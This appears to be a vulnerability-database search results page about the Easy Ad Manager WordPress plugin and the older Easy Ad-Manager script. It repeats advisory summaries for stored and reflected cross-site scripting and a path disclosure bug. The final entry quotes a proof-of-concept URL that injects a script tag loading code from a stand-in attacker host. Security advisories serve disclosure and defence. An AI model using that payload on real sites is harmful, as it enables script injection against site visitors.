19 matches found
EUVD-2006-2999
Malware in sbrugna...
EUVD-2006-3000
Malware in sbrugna...
EUVD-2023-29415
Malicious code in bioql PyPI...
CVE-2023-25460
Auth. admin+ Stored Cross-Site Scripting XSS vulnerability in CodeSolz Easy Ad Manager plugin = 1.0.0 versions...
CVE-2023-25460
Auth. admin+ Stored Cross-Site Scripting XSS vulnerability in CodeSolz Easy Ad Manager plugin = 1.0.0 versions...
Cross site scripting
Auth. admin+ Stored Cross-Site Scripting XSS vulnerability in CodeSolz Easy Ad Manager plugin = 1.0.0 versions...
CVE-2023-25460
CVE-2023-25460 covers a Stored XSS vulnerability in the WordPress plugin CodeSolz Easy Ad Manager (vulnerable:
CVE-2023-25460 WordPress Easy Ad Manager Plugin <= 1.0.0 is vulnerable to Cross Site Scripting (XSS)
Auth. admin+ Stored Cross-Site Scripting XSS vulnerability in CodeSolz Easy Ad Manager plugin = 1.0.0 versions...
CVE-2023-25460 WordPress Easy Ad Manager Plugin <= 1.0.0 is vulnerable to Cross Site Scripting (XSS)
Auth. admin+ Stored Cross-Site Scripting XSS vulnerability in CodeSolz Easy Ad Manager plugin = 1.0.0 versions...
WordPress Plugin Easy Ad Manager 跨站脚本漏洞
WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. WordPress plugin is an application plugin that supports personal blogs on PHP and MySQL servers. A cross-site scripting vulnerability exists in WordPress...
Easy Ad Manager <= 1.0.0 - Admin+ Stored XSS
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup...
WordPress Easy Ad Manager Plugin <= 1.0.0 is vulnerable to Cross Site Scripting (XSS)
Software Easy Ad Manager Type Plugin Vulnerable versions = 1.0.0 Fixed in N/A OWASP Top 10 A7: Cross-Site Scripting XSS Classification Cross Site Scripting XSS CVE CVE-2023-25460 Patch priority Low CVSS severity Low 5.9 Developer Claim ownership PSID 156e8aac6b3e Credits Lokesh Dachepalli Require...
CVE-2006-3002
Cross-site scripting XSS vulnerability in details.php in Easy Ad-Manager allows remote attackers to inject arbitrary web script or HTML via the mbid parameter, which is reflected in an error message. NOTE: on 20060829, the vendor notified CVE that this issue has been fixed...
CVE-2006-3003
details.php in Easy Ad-Manager allows remote attackers to obtain the full installation path via an invalid mbid parameter, which leaks the path in an error message. NOTE: this might be resultant from another vulnerability, since this vector also produces cross-site scripting XSS. NOTE: on 2006082...
CVE-2006-3003
CVE-2006-3003 affects Easy Ad-Manager: details.php accepts an invalid mbid parameter which can reveal the full installation path in an error message. The issue may tie to a related XSS vector. The vendor was notified on 2006-08-29 that the issue was fixed. The public details specify the vulnerabi...
CVE-2006-3003
details.php in Easy Ad-Manager allows remote attackers to obtain the full installation path via an invalid mbid parameter, which leaks the path in an error message. NOTE: this might be resultant from another vulnerability, since this vector also produces cross-site scripting XSS. NOTE: on 2006082...
CVE-2006-3002
Cross-site scripting XSS vulnerability in details.php in Easy Ad-Manager allows remote attackers to inject arbitrary web script or HTML via the mbid parameter, which is reflected in an error message. NOTE: on 20060829, the vendor notified CVE that this issue has been fixed...
CVE-2006-3002
The CVE-2006-3002 issue affects Easy Ad-Manager (details.php) with an XSS in the mbid parameter, where input reflected in an error message can lead to arbitrary script execution. The vulnerability is described across multiple sources (NVD, CVE List) as a reflected XSS. A fix was reported by the v...
Easy Ad-Manager
Easy Ad-Manager v. unknown, not listed on homepage Homepage: http://www.scriptsez.net Effected files: details.php XSS Vulnerability with full path disclosure: http://www.example.com/eam/details.php?do=load&mbid=/SCRIPT20SRC=http://evilsite.com/xss.js/SCRIPT Warning: fopenstats//This is remote tex...